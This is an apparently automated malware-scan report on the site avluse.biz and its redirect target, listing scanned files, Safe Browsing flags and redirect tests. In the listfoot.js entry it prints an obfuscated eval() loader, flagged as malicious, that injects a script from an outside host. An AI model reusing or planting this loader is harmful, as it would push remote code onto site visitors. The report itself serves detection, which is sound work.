Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=avluse.biz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.avluse.biz/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 07 Mar 2015 03:34:28 GMT Location: http://www.sexiaoma.com/ Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.sexiaoma.com/ | 200 OK Content-Length: 33659 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: so.avluse.biz ...[1268 bytes skipped]... <body> <div class="wrap"><div class="header"> <div class="logo"><ul id="qire-plus"><li id="history"><a href="javascript:void(0);"><i class="ui-icon new-icon"></i>ææ¾<br />è®°å½</a></li><li><a href="/detail/new.html"><i class="ui-icon help-icon"></i>ä»æ¥<br />æ´æ°</a></li><li><a href="http://so.avluse.biz/gb-show-p-1.html"><i class="ui-icon gb-icon"></i>çè¨<br />åé¦</a></li><li><a target="_self" id="fav" href="javascript:void(0);"><i class="ui-icon fav-icon"></i>æ¶è<br />æ¬ç«</a></li></ul><a href="/"><img src="/Tpl/defalut/images/logo.gif" alt="avæ¸è²"/></a><span><script type="text/javascript" src="/Runtime/js/header.js" charset="utf-8"></script></span ...[2887 bytes skipped]... | ||
http://www.sexiaoma.com/Public/jquery/jquery-1.7.2.min.js | 200 OK Content-Length: 95330 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Public/jquery/jquery.autocomplete-1.1.js | 200 OK Content-Length: 14091 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Public/jquery/jquery.lazyload-1.8.4.js | 200 OK Content-Length: 3205 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Tpl/defalut/js/home.js | 200 OK Content-Length: 14919 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Runtime/js/header.js | 200 OK Content-Length: 214 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Runtime/js/top960.js | 200 OK Content-Length: 84 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Runtime/js/indextop.js | 200 OK Content-Length: 19 Content-Type: application/x-javascript | clean |
http://js.users.51.la/16853280.js | 200 OK Content-Length: 1947 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Runtime/js/index960.js | 200 OK Content-Length: 153 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/detail/new.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 07 Mar 2015 03:34:45 GMT Location: http://www.sexiaoma.com/detail/new.html Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.sexiaoma.com/detail/new.html | 200 OK Content-Length: 19769 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: so.avluse.biz ...[1254 bytes skipped]... lt;body> <div class="wrap"> <div class="header"> <div class="logo"><ul id="qire-plus"><li id="history"><a href="javascript:void(0);"><i class="ui-icon new-icon"></i>ææ¾<br />è®°å½</a></li><li><a href="/detail/new.html"><i class="ui-icon help-icon"></i>ä»æ¥<br />æ´æ°</a></li><li><a href="http://so.avluse.biz/gb-show-p-1.html"><i class="ui-icon gb-icon"></i>çè¨<br />åé¦</a></li><li><a target="_self" id="fav" href="javascript:void(0);"><i class="ui-icon fav-icon"></i>æ¶è<br />æ¬ç«</a></li></ul><a href="/"><img src="/Tpl/defalut/images/logo.gif" alt="avæ¸è²"/></a><span><script type="text/javascript" src="/Runtime/js/header.js" charset="utf-8"></script></span ...[2884 bytes skipped]... | ||
http://www.sexiaoma.com/Public/jquery/jquery.autocomplete-1.1.js | 200 OK Content-Length: 14091 Content-Type: application/x-javascript | clean |
http://www.avluse.biz/Runtime/js/listfoot.js | 200 OK Content-Length: 599 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write ('<!--å³ä¸è§ç¹å»_CPC-->');eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('a.9(\'<0 b="d://c.4.2:5/8.6?e=k&j=7&l=3&f=i&h=&g=1"></0>\');',22,22,'script||cc||cpva|899|aspx||cf|write|document|src|vpn|http|action|username|cycsel|lowunionnsername|zhuzhujun|ad_class|cycteamget|cycteamid'.split('|'),0,{})) Antivirus reports:
| ||
http://www.avluse.biz/1/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 07 Mar 2015 03:34:49 GMT Location: http://www.sexiaoma.com/1/ Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.sexiaoma.com/1/ | 200 OK Content-Length: 14710 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: so.avluse.biz ...[1183 bytes skipped]... body> <div class="wrap"> <div class="header"> <div class="logo"><ul id="qire-plus"><li id="history"><a href="javascript:void(0);"><i class="ui-icon new-icon"></i>ææ¾<br />è®°å½</a></li><li><a href="/detail/new.html"><i class="ui-icon help-icon"></i>ä»æ¥<br />æ´æ°</a></li><li><a href="http://so.avluse.biz/gb-show-p-1.html"><i class="ui-icon gb-icon"></i>çè¨<br />åé¦</a></li><li><a target="_self" id="fav" href="javascript:void(0);"><i class="ui-icon fav-icon"></i>æ¶è<br />æ¬ç«</a></li></ul><a href="/"><img src="/Tpl/defalut/images/logo.gif" alt="avæ¸è²"/></a><span><script type="text/javascript" src="/Runtime/js/header.js" charset="utf-8"></script></span ...[3106 bytes skipped]... | ||
http://www.sexiaoma.com/Public/jquery/jquery.lazyload-1.8.4.js | 200 OK Content-Length: 3205 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: avluse.biz
Result:
GET / HTTP/1.1
Host: avluse.biz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: avluse.biz
Referer: http://www.google.com/search?q=avluse.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: avluse.biz
Referer: http://www.google.com/search?q=avluse.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.